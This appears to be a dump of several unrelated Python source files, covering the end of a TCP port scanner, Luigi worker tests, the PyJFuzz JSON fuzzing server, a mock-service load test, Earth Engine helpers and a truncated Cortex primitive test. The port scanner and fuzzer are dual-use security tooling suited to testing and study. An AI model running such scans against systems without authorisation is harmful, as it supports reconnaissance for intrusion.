"4004,4005,4006,4045,4111,4125,4126,4129,4224,4242,4279,4321,4343,4443,4446,4449,4550,4567," \
"4662,4848,4899,4900,4998,5000,5001,5002,5003,5004,5009,5030,5033,5050,5051,5054,5060,5061," \
"5080,5087,5100,5102,5120,5190,5200,5214,5221,5222,5225,5226,5269,5280,5298,5357,5405," \
"5414,5431,5432,5440,5500,5510,5544,5550,5555,5560,5566,5631,5633,5666,5678,5679,5718,5730,5800," \
"5801,5802,5810,5811,5815,5822,5825,5850,5859,5862,5877,5900,5901,5902,5903,5904,5906,5907,5910,5911," \
"5915,5922,5925,5950,5952,5959,5960,5961,5962,5963,5987,5988,5989,5998,5999,6000,6001,6002," \
"6003,6004,6005,6006,6007,6009,6025,6059,6100,6101,6106,6112,6123,6129,6156,6346,6389,6502," \
"6510,6543,6547,6565,6567,6580,6646,6666,6667,6668,6669,6689,6692,6699,6779,6788,6789,6792," \
"6839,6881,6901,6969,7000,7001,7002,7004,7007,7019,7025,7070,7100,7103,7106,7200,7201,7402," \
"7435,7443,7496,7512,7625,7627,7676,7741,7777,7778,7800,7911,7920,7921,7937,7938,7999,8000," \
"8001,8002,8007,8008,8009,8010,8011,8021,8022,8031,8042,8045,8080,8081,8082,8083,8084,8085," \
"8086,8087,8088,8089,8090,8093,8099,8100,8180,8181,8192,8193,8194,8200,8222,8254,8290,8291," \
"8292,8300,8333,8383,8400,8402,8443,8500,8600,8649,8651,8652,8654,8701,8800,8873,8888,8899," \
"8994,9000,9001,9002,9003,9009,9010,9011,9040,9050,9071,9080,9081,9090,9091,9099,9100,9101,9102," \
"9103,9110,9111,9200,9207,9220,9290,9415,9418,9485,9500,9502,9503,9535,9575,9593,9594,9595," \
"9618,9666,9876,9877,9878,9898,9900,9917,9929," \
"9943,9944,9968,9998,9999,10000,10001,10002,10003,10004,10009,10010,10012,10024,10025,10082," \
"10180,10215,10243,10566,10616,10617,10621,10626,10628,10629,10778,11110,11111,11967,12000,12174," \
"12265,12345,13456,13722,13782,13783,14000,14238,14441,14442,15000,15002,15001,15002,15003," \
"15004,15660,15742,16000,16001,16012,16016,16018,16080,16113,16992,16993,17877,17988,18040,18101," \
"18988,19101,19283,19315,19350,19780,19801,19842,20000,20005,20031,20221,20222,20828,21571,22939," \
"23502,24444,24800,25734,25735,26214,27000,27352,27353,27355,27356,27715,28201,30000,30718,30951," \
"31038,31337,32768,32769,32770,32771,32772,32773,32774,32775,32776," \
"32777,32778,32779,32780,32781,32782,32783,32784,32785,33354,33899,34571,34572,34573,35500,38292," \
"40193,40911,41511,42510,44176,44442,44443,44501,45100,48080,49152,49153,49154,49155,49156,49157," \
"49158,49159,49160,49161,49163,49165,49167,49175,49176,49400,49999,50000,50001,50002," \
"50003,50006,50300,50389,50500,50636,50800,51103,51493,52673,52822,52848,52869,54045,54328," \
"55055,55056,55555,55600,56737,56738,57294,57797,58080,60020,60443,61532,61900,62078,63331,64623," \
"64680,65000,65129,65389"
tgtPorts = str(temp).split(',')
else:
pass
portScan(tgtHost, tgtPorts)
print('[+] Finished TCP scan.')
if __name__ == '__main__':
main()
|
worker_test.py
|
# Copyright (c) 2012 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import time
from luigi.scheduler import CentralPlannerScheduler
import luigi.worker
from luigi.worker import Worker
from luigi import Task, ExternalTask, RemoteScheduler
import unittest
import logging
import threading
import luigi.notifications
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self.task_id)
self.has_run = True
class WorkerTest(unittest.TestCase):
def setUp(self):
# InstanceCache.disable()
self.sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.w = Worker(scheduler=self.sch, worker_id='X')
self.w2 = Worker(scheduler=self.sch, worker_id='Y')
self.time = time.time
def tearDown(self):
if time.time != self.time:
time.time = self.time
self.w.stop()
self.w2.stop()
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.w.add(b)
self.w.run()
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.w.add(b)
self.w.run()
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_fail(self):
class A(Task):
def run(self):
self.has_run = True
raise Exception()
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.w.add(b)
self.w.run()
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see central_planner_test.CentralPlannerTest.test_remove_dep
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.w.add(b_a)
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.w2.add(b_c)
self.w.run() # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEquals(eb.task_id, "B()")
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id='X')
w2 = Worker(scheduler=sch, worker_id='Y')
w.add(b)
w2.add(eb)
logging.debug("RUNNING BROKEN WORKER")
w2.run()
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
w.stop()
w2.stop()
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
class ExternalB(ExternalTask):
task_family = "B"
def complete(self):
return False
b = B()
eb = ExternalB()
self.assertEquals(eb.task_id, "B()")
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id='X')
w2 = Worker(scheduler=sch, worker_id='Y')
w2.add(eb)
w.add(b)
w2.run()
self.assertFalse(b.complete())
w.run()
self.assertTrue(b.complete())
w.stop()
w2.stop()
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id='X', keep_alive=True)
w2 = Worker(scheduler=sch, worker_id='Y', keep_alive=True, wait_interval=0.1)
w.add(a)
w2.add(b)
threading.Thread(target=w.run).start()
w2.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
w.stop()
w2.stop()
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
w = Worker(scheduler=sch, worker_id="foo")
w.add(b)
w.run()
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
w.stop()
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = CentralPlannerScheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
w = Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
)
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
w.stop()
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
w = Worker(ping_interval=0.01)
self.assertTrue(w._keep_alive_thread.is_alive())
w.stop() # should stop within 0.01 s
self.assertFalse(w._keep_alive_thread.is_alive())
class EmailTest(unittest.TestCase):
def setUp(self):
super(EmailTest, self).setUp()
self.send_email = luigi.notifications.send_email
self.last_email = None
def mock_send_email(subject, message, sender, recipients, image_png=None):
self.last_email = (subject, message, sender, recipients, image_png)
luigi.notifications.send_email = mock_send_email
def tearDown(self):
luigi.notifications.send_email = self.send_email
class WorkerEmailTest(EmailTest):
def setUp(self):
super(WorkerEmailTest, self).setUp()
sch = CentralPlannerScheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.worker = Worker(scheduler=sch, worker_id="foo")
def tearDown(self):
self.worker.stop()
def test_connection_error(self):
sch = RemoteScheduler(host="this_host_doesnt_exist", port=1337)
worker = Worker(scheduler=sch)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEquals(self.last_email, None)
worker.add(a)
self.assertEquals(self.waits, 2) # should attempt to add it 3 times
self.assertNotEquals(self.last_email, None)
self.assertEquals(self.last_email[0], "Luigi: Framework error while scheduling %s" % (a,))
worker.stop()
def test_complete_error(self):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEquals(self.last_email, None)
self.worker.add(a)
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.worker.run()
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.assertFalse(a.has_run)
def test_complete_return_value(self):
class A(DummyTask):
def complete(self):
pass # no return value should be an error
a = A()
self.assertEquals(self.last_email, None)
self.worker.add(a)
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.worker.run()
self.assertEquals(("Luigi: %s failed scheduling" % (a,)), self.last_email[0])
self.assertFalse(a.has_run)
def test_run_error(self):
class A(luigi.Task):
def complete(self):
return False
def run(self):
raise Exception("b0rk")
a = A()
self.worker.add(a)
self.assertEquals(self.last_email, None)
self.worker.run()
self.assertEquals(("Luigi: %s FAILED" % (a,)), self.last_email[0])
def test_no_error(self):
class A(DummyTask):
pass
a = A()
self.assertEquals(self.last_email, None)
self.worker.add(a)
self.assertEquals(self.last_email, None)
self.worker.run()
self.assertEquals(self.last_email, None)
self.assertTrue(a.complete())
if __name__ == '__main__':
unittest.main()
|
pjf_server.py
|
"""
The MIT License (MIT)
Copyright (c) 2016 Daniele Linguaglossa <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NON INFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from wsgiref.simple_server import make_server, WSGIRequestHandler
from bottle import route, run, ServerAdapter, response, request, static_file
from .pjf_testcase_server import PJFTestcaseServer
from .errors import PJFBaseException
from .errors import PJFMissingArgument
from threading import Thread
from .pjf_logger import PJFLogger
from .pjf_factory import PJFFactory
from .certs import CERT_PATH
import multiprocessing
import signal
import time
import ssl
import sys
import os
import socket
class WSGIRefServer(ServerAdapter):
"""
WSGI based server class using SSL
"""
def run(self, handler):
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw):
pass
def log_error(self, format, *args):
pass
self.options['handler_class'] = QuietHandler
srv = make_server(self.host, self.port, handler, **self.options)
srv.serve_forever()
class SSLWSGIRefServer(ServerAdapter):
"""
WSGI based server class using SSL
"""
def run(self, handler):
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw):
pass
def log_error(self, format, *args):
pass
self.options['handler_class'] = QuietHandler
srv = make_server(self.host, self.port, handler, **self.options)
srv.socket = ssl.wrap_socket(srv.socket, certfile=CERT_PATH, server_side=True)
srv.serve_forever()
class PJFServer:
"""
Class used to run both HTTP and HTTPS server using bottle web server
"""
def __init__(self, configuration):
self.client_queue = multiprocessing.Queue(0)
self.apply_patch()
self.logger = self.init_logger()
if ["debug", "html", "content_type", "notify", "ports"] not in configuration:
raise PJFMissingArgument()
if configuration.debug:
print("[\033[92mINFO\033[0m] Starting HTTP ({0}) and HTTPS ({1}) built-in server...".format(
configuration.ports["servers"]["HTTP_PORT"],
configuration.ports["servers"]["HTTPS_PORT"]
))
if not configuration.content_type:
configuration.content_type = False
if not configuration.content_type:
configuration.content_type = "application/json"
self.config = configuration
self.json = PJFFactory(configuration)
self.https = SSLWSGIRefServer(host="0.0.0.0", port=self.config.ports["servers"]["HTTPS_PORT"])
self.http = WSGIRefServer(host="0.0.0.0", port=self.config.ports["servers"]["HTTP_PORT"])
self.httpsd = multiprocessing.Process(target=run, kwargs={"server": self.https, "quiet": True})
self.httpd = multiprocessing.Process(target=run, kwargs={"server": self.http, "quiet": True})
if self.config.fuzz_web:
self.request_checker = Thread(target=self.request_pool, args=())
self.logger.debug("[{0}] - PJFServer successfully initialized".format(time.strftime("%H:%M:%S")))
def run(self):
"""
Start the servers
"""
route("/")(self.serve)
if self.config.html:
route("/<filepath:path>")(self.custom_html)
if self.config.fuzz_web:
self.request_checker.start()
self.httpd.start()
self.httpsd.start()
def save_testcase(self, ip, testcases):
try:
count = 0
dir_name = "testcase_{0}".format(ip)
print("[\033[92mINFO\033[0m] Client {0} seems to not respond anymore, saving testcases".format(ip))
try:
os.mkdir(dir_name)
except OSError:
pass
for test in testcases:
with open("{0}/testcase_{1}.json".format(dir_name, count), "wb") as t:
t.write(test)
t.close()
count += 1
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def request_pool(self):
try:
clients = {}
end = False
while not end:
try:
client = self.client_queue.get(timeout=5)
if client == (0,0):
end = True
else:
if client[0] not in clients:
clients.update({client[0]: {"timestamp": time.time(), "testcases": []}})
else:
clients[client[0]]["timestamp"] = time.time()
if len(clients[client[0]]["testcases"]) <= 10:
clients[client[0]]["testcases"].append(client[1])
else:
clients[client[0]]["testcases"].pop(0)
clients[client[0]]["testcases"].append(client[1])
except:
pass
for c in list(clients.keys()):
if time.time() - clients[c]["timestamp"] >= 30:
self.save_testcase(c, clients[c]["testcases"])
del clients[c]
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def stop(self):
"""
Kill the servers
"""
os.kill(self.httpd.pid, signal.SIGKILL)
os.kill(self.httpsd.pid, signal.SIGKILL)
self.client_queue.put((0,0))
if self.config.fuzz_web:
self.request_checker.join()
self.logger.debug("[{0}] - PJFServer successfully completed".format(time.strftime("%H:%M:%S")))
def custom_html(self, filepath):
"""
Serve custom HTML page
"""
try:
response.headers.append("Access-Control-Allow-Origin", "*")
response.headers.append("Accept-Encoding", "identity")
response.headers.append("Content-Type", "text/html")
return static_file(filepath, root=self.config.html)
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def serve(self):
"""
Serve fuzzed JSON object
"""
try:
fuzzed = self.json.fuzzed
if self.config.fuzz_web:
self.client_queue.put((request.environ.get('REMOTE_ADDR'), fuzzed))
response.headers.append("Access-Control-Allow-Origin", "*")
response.headers.append("Accept-Encoding", "identity")
response.headers.append("Content-Type", self.config.content_type)
if self.config.notify:
PJFTestcaseServer.send_testcase(fuzzed, '127.0.0.1', self.config.ports["servers"]["TCASE_PORT"])
yield fuzzed
except Exception as e:
raise PJFBaseException(e.message if hasattr(e, "message") else str(e))
def init_logger(self):
"""
Init the default logger
"""
return PJFLogger.init_logger()
def apply_patch(self):
"""
Fix default socket lib to handle client disconnection while receiving data (Broken pipe)
"""
if sys.version_info >= (3, 0):
# No patch for python >= 3.0
pass
else:
from .patch.socket import socket as patch
socket.socket = patch
|
perf_test_mock_service_v4_test_timer.py
|
import requests
import threading
import queue
import sys
import time
# Global variables
queue_results = queue.Queue()
start_time = 0
# event flag to set and check test time is up.
event_time_up = threading.Event()
def test_mock_service():
url = 'http://127.0.0.1:5000/json'
resp = requests.get(url)
# Convert assert for functional tests to validate for performance tests so it won't stop on a test failure.
# assert resp.status_code == 200
# assert resp.json()["code"] == 1
if resp.status_code != 200:
print('Test failed with response status code %s.' % resp.status_code )
return 'fail', resp.elapsed.total_seconds()
elif resp.json()["code"] != 1:
print('Test failed with code %s != 1.' % resp.json()["code"] )
return 'fail', resp.elapsed.total_seconds()
else:
# print('Test passed.')
return 'pass', resp.elapsed.total_seconds()
def set_event_time_up():
if not event_time_up.is_set():
event_time_up.set()
def loop_test(loop_wait=0, loop_times=sys.maxsize):
looped_times = 0
while (looped_times < loop_times
and not event_time_up.is_set()):
# run an API test
test_result, elapsed_time = test_mock_service()
# put results into a queue for statistics
queue_results.put(['test_mock_service', test_result, elapsed_time])
# You can add more API tests in a loop here.
looped_times += 1
time.sleep(loop_wait)
def stats():
# request per second
rps_mean = 0
total_tested_requests = 0
total_pass_requests = 0
# time per request
tpr_min = 999
tpr_mean = 0
tpr_max = 0
sum_response_time = 0
# failures
total_fail_requests = 0
total_exception_requests = 0
global start_time
end_time = time.time()
# get the approximate queue size
qsize = queue_results.qsize()
loop = 0
for i in range(qsize):
try:
result=queue_results.get_nowait()
loop +=1
except Empty:
break
# calc stats
if result[1] == 'exception':
total_exception_requests += 1
elif result[1] == 'fail':
total_fail_requests += 1
elif result[1] == 'pass':
total_pass_requests += 1
sum_response_time += result[2]
# update min and max time per request
if result[2] < tpr_min:
tpr_min = result[2]
if result[2] > tpr_max:
tpr_max = result[2]
total_tested_requests += loop
# time per requests - mean (avg)
if total_pass_requests != 0:
tpr_mean = sum_response_time / total_pass_requests
# requests per second - mean
if start_time == 0:
print('stats: start_time is not set, skipping rps stats.')
else:
tested_time = end_time - start_time
rps_mean = total_pass_requests / tested_time
# print stats
print('\n-----------------Test Statistics---------------')
print(time.asctime())
print('Total requests: %s, pass: %s, fail: %s, exception: %s'
% (total_tested_requests, total_pass_requests, total_fail_requests, total_exception_requests)
)
if total_pass_requests > 0:
print('For pass requests:')
print('Request per Second - mean: %.2f' % rps_mean)
print('Time per Request - mean: %.6f, min: %.6f, max: %.6f'
% (tpr_mean, tpr_min, tpr_max) )
if __name__ == '__main__':
### Test Settings ###
concurrent_users = 2
loop_times = 100
test_time = 5 # time in seconds, e.g. 36000
workers = []
start_time = time.time()
print('Tests started at %s.' % start_time )
# start concurrent user threads
for i in range(concurrent_users):
thread = threading.Thread(target=loop_test, kwargs={'loop_times': loop_times}, daemon=True)
thread.start()
workers.append(thread)
# set a timer to stop testing
timer = threading.Timer(test_time, set_event_time_up)
timer.start()
# Block until all threads finish.
for w in workers:
w.join()
# stop timer if loop_times is reached first.
if not event_time_up.is_set():
timer.cancel()
end_time = time.time()
# Performance stats
stats()
print('\nTests ended at %s.' % end_time )
print('Total test time: %s seconds.' % (end_time - start_time) )
|
__init__.py
|
# coding=utf-8
""" User Interface Tools """
import ee
import threading
import pprint
from . import dispatcher, map
ASYNC = False
def eprint(*args, **kwargs):
""" Print EE Objects. Similar to `print(object.getInfo())` but with
some magic (lol)
:param eeobject: object to print
:type eeobject: ee.ComputedObject
:param indent: indentation of the print output
:type indent: int
:param do_async: call getInfo() asynchronously
:type do_async: bool
"""
indent = kwargs.get('indent', 2)
do_async = kwargs.get('do_async', ASYNC)
pp = pprint.PrettyPrinter(indent=indent)
info_return = [None]*len(args)
def get_info(eeobject, index):
""" Get Info """
info_return[index] = dispatcher.dispatch(eeobject)
for i, eeobject in enumerate(args):
# DO THE SAME FOR EVERY OBJECT
if do_async:
thread = threading.Thread(target=get_info,
args=(eeobject, i))
thread.start()
else:
get_info(eeobject, i)
for result in info_return:
pp.pprint(result)
def getInfo(eeobject):
""" Get eeobject information (getInfo) asynchronously. For not async just
use `ee.data.getInfo` """
class newDict(dict):
def get(self):
return self['info']
def __call__(self):
return self.get()
result = newDict({'info':None})
def get_info(eeobject, from_ee):
if from_ee:
info = eeobject.getInfo()
else:
info = eeobject
result['info'] = info
module = getattr(eeobject, '__module__', None)
parent = module.split('.')[0] if module else None
if parent == ee.__name__:
thread = threading.Thread(target=get_info, args=(eeobject, True))
thread.start()
else:
get_info(eeobject, False)
return result
|
PrimitiveTest.py
|
##########################################################################
#
# Copyright (c) 2008-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import unittest
import time
import threading
import imath
import tempfile
import os
import shutil
import IECore
import IECoreScene
class PrimitiveTest( unittest.TestCase ) :
def test( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
self.assertEqual( m.inferInterpolation( 1 ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( 2 ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
self.assertEqual( m.inferInterpolation( 4 ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
self.assertEqual( m.inferInterpolation( 6 ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
self.assertEqual( m.inferInterpolation( 0 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
self.assertEqual( m.inferInterpolation( 10 ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
self.assertEqual( m.inferInterpolation( IECore.FloatData( 1 ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( IECore.V3fVectorData( [ imath.V3f( 1 ) ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Constant )
self.assertEqual( m.inferInterpolation( IECore.FloatVectorData( [ 2, 3 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Uniform )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Vertex )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.FaceVarying )
self.assertEqual( m.inferInterpolation( IECore.IntVectorData( [ 1, 2, 3, 4, 5, 6, 7 ] ) ), IECoreScene.PrimitiveVariable.Interpolation.Invalid )
def testCopyFrom( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
m2 = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 3, 2, 1 ] ) )
m2["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) )
self.assertNotEqual( m, m2 )
m2.copyFrom( m )
self.assertEqual( m, m2 )
def testLoad( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3, 3 ] ), IECore.IntVectorData( [ 0, 1, 2, 2, 1, 3 ] ) )
m["P"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.V3fVectorData( [ imath.V3f(1), imath.V3f(2), imath.V3f(3), imath.V3f(4) ] ) )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.FaceVarying, IECore.FloatVectorData( [ 1, 2 ] ), IECore.IntVectorData( [ 1, 0, 1, 0, 1, 0 ] ) )
self.assertTrue( m.arePrimitiveVariablesValid() )
tempDir = tempfile.mkdtemp()
IECore.Writer.create( m, os.path.join( tempDir, "testPrimitiveLoad.cob" ) ).write()
m2 = IECore.Reader.create( os.path.join( tempDir, "testPrimitiveLoad.cob" ) ).read()
self.assertTrue( m2.arePrimitiveVariablesValid() )
self.assertEqual( m, m2 )
shutil.rmtree(tempDir)
def testHash( self ) :
hashes = []
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
hashes.append( m.hash() )
m["a"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["a"].data[0] = 2
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ), IECore.IntVectorData( [ 0 ] ) )
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
m["b"].indices[0] = 1
for h in hashes :
self.assertNotEqual( h, m.hash() )
hashes.append( m.hash() )
def testPrimitiveVariableDataValidity( self ) :
m = IECoreScene.MeshPrimitive( IECore.IntVectorData( [ 3 ] ), IECore.IntVectorData( [ 0, 1, 2 ] ) )
# only vector data
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatVectorData( [ 1 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Uniform, IECore.FloatData( 1 ) ) ) )
# constant can be anything
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Constant, IECore.FloatData( 1 ) ) ) )
# data size matches interpolation
self.assertTrue( m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3 ] ) ) ) )
self.assertTrue( not m.isPrimitiveVariableValid( IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData( [ 1, 2, 3, 4 ] ) ) ) )
# data size (not base size) matches interpolation
